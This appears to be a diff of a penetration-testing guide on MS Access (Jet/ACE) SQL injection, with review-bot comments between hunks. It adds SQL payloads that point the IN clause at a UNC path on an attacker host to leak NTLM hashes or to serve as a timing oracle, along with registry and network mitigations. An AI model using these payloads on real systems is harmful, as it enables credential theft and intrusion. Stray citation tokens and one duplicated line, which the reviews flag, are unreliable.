@@ -127,9 +127,21 @@ IIF((select mid(last(username),1,1) from (select top 10 username from users))='a
127
127
128
128
In a nutshell, the query uses an “if-then” statement in order to trigger a “200 OK” in case of success or a “500 Internal Error” otherwise. Taking advantage of the TOP 10 operator, it is possible to select the first ten results. The subsequent usage of LAST allows to consider the 10th tuple only. On such value, using the MID operator, it is possible to perform a simple character comparison. Properly changing the index of MID and TOP, we can dump the content of the “username” field for all rows.
Jet/ACE SQL itself does **not** expose a native `SLEEP()`or`WAITFOR` function, so traditional time-based blind injections are limited. However, you can still introduce a measurable delay by forcing the engine to access a **network resource that is slow or does not answer**. Because the engine will try to open the file before returning the result, the HTTP response time reflects the round-trip latency to the attacker-controlled host.
133
+
134
+
```sql
135
+
' UNION SELECT 1 FROM SomeTable IN '\\10.10.14.3\doesnotexist\dummy.mdb'--
136
+
```
137
+
138
+
Point the UNC path to:
139
+
140
+
* a SMB share behind a high-latency link
141
+
* a host that drops the TCP handshake after `SYN-ACK`
142
+
* a firewall sinkhole
143
+
144
+
The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0
133
145
134
146
### Other Interesting functions
135
147
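Review bot: the new timing-oracle paragraph ends in a stray `citeturn1search0` token after the KB5002984 sentence and runs the code spans together in `SLEEP()`or`WAITFOR`; replace the token with a link to the KB5002984 entry this same commit adds to the reference list and write `SLEEP()` or `WAITFOR`. In the payload `' UNION SELECT 1 FROM SomeTable IN '\\10.10.14.3\doesnotexist\dummy.mdb'--`, `10.10.14.3` and `SomeTable` read as values from a specific lab rather than engine behaviour; mark them as placeholders. "a SMB share" should read "an SMB share". The paragraph would also benefit from one sentence tying it to the mitigations added later in this change: the delay exists only because the engine reaches out to a remote path, so `AllowQueryRemoteTables = 0` and blocking outbound SMB/WebDAV remove this oracle as well, and an unexpected outbound SMB/WebDAV connection from the web server is the signal a defender can alert on.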
@@ -162,7 +174,7 @@ However, note that is very typical to find SQL Injections where you **don't have
162
174
163
175
The knowledge of the **web root absolute path may facilitate further attacks**. If application errors are not completely concealed, the directory path can be uncovered trying to select data from an inexistent database.
Where **name\[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
197
+
Where **name[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
Since Jet 4.0 every query can reference a table located in a *different* `.mdb/.accdb` file via the `IN'<path>'` clause:
202
+
203
+
```sql
204
+
SELECT first_name FROM Employees IN'\\server\share\hr.accdb';
205
+
```
206
+
207
+
If user input is concatenated into the part after **IN** (or into a `JOIN … IN` / `OPENROWSET` / `OPENDATASOURCE` call) an attacker can specify a **UNC path** that points to a host they control. The engine will:
208
+
209
+
1. try to authenticate over SMB / HTTP to open the remote database;
210
+
2. leak the web-server’s **NTLM credentials** (forced authentication);
211
+
3. parse the remote file – a malformed or malicious database can trigger Jet/ACE memory-corruption bugs that have been patched multiple times (e.g. CVE-2021-28455).
212
+
213
+
Practical injection example:
214
+
215
+
```sql
216
+
1' UNION SELECT TOP 1 name
217
+
FROM MSysObjects
218
+
IN '\\attacker\share\poc.mdb'-- -
219
+
```
220
+
221
+
Impact:
222
+
223
+
* Out-of-band exfiltration of Net-NTLMv2 hashes (usable for relay or offline cracking).
224
+
* Potential remote code execution if a new Jet/ACE parser bug is exploited.
225
+
226
+
Mitigations (recommended even for legacy Classic ASP apps):
227
+
228
+
* Add the registry value `AllowQueryRemoteTables = 0` under `HKLM\Software\Microsoft\Jet\4.0\Engines` (and under the equivalent ACE path). This forces Jet/ACE to reject remote paths starting with `\\`.
229
+
* Block outbound SMB/WebDAV at the network boundary.
230
+
* Sanitize / parameterise any part of a query that may end up inside an `IN` clause.
231
+
232
+
The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0
186
233
187
234
### .mdb Password Cracker
188
235
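Review bot: both payloads in this change, `... IN '\\10.10.14.3\doesnotexist\dummy.mdb'--` earlier and `IN '\\attacker\share\poc.mdb'-- -` here, depend on `--` comment terminators, but nothing in the change establishes that Jet/ACE honours SQL comments; confirm the payloads parse as written or say the terminator is engine-dependent. The first example, `SELECT first_name FROM Employees IN'\\server\share\hr.accdb';`, omits the space after `IN` that the second example and the prose use; pick one form. The line beginning "Where **name[i] is a .mdb filename**" repeats the unchanged sentence directly above it, differing only in the escaped bracket; if the intent was to fix the escaping, remove the old line rather than duplicating the sentence. In the mitigations list, `AllowQueryRemoteTables = 0` is described as rejecting "remote paths starting with `\\`"; the linked KB5002984 is the authority on exactly what the value blocks, so quote its scope rather than paraphrase it, and spell out the ACE registry path instead of "the equivalent ACE path", since that is the path a current IIS host actually needs. The closing sentence ends in a stray `citeturn0search0` token; replace it with a link to the Check Point entry added to the references in this commit.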
@@ -191,8 +238,7 @@ Where **name\[i] is a .mdb filename** and **realTable is an existent table** wit
- [Microsoft KB5002984 – Configuring Jet/ACE to block remote tables](https://support.microsoft.com/en-gb/topic/kb5002984-configuring-jet-red-database-engine-and-access-connectivity-engine-to-block-access-to-remote-databases-56406821-30f3-475c-a492-208b9bd30544)
242
+
- [Check Point Research – Abusing Microsoft Access Linked Tables for NTLM Forced Authentication (2023)](https://research.checkpoint.com/2023/abusing-microsoft-access-linked-table-feature-to-perform-ntlm-forced-authentication-attacks/)
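Review bot: the two new reference entries are never linked from the body; the earlier hunks point at them only through the leftover `citeturn1search0` and `citeturn0search0` tokens. Convert those tokens into inline links (or the footnote style the rest of the reference list uses) to these two entries so the KB5002984 and Check Point claims are actually attributed.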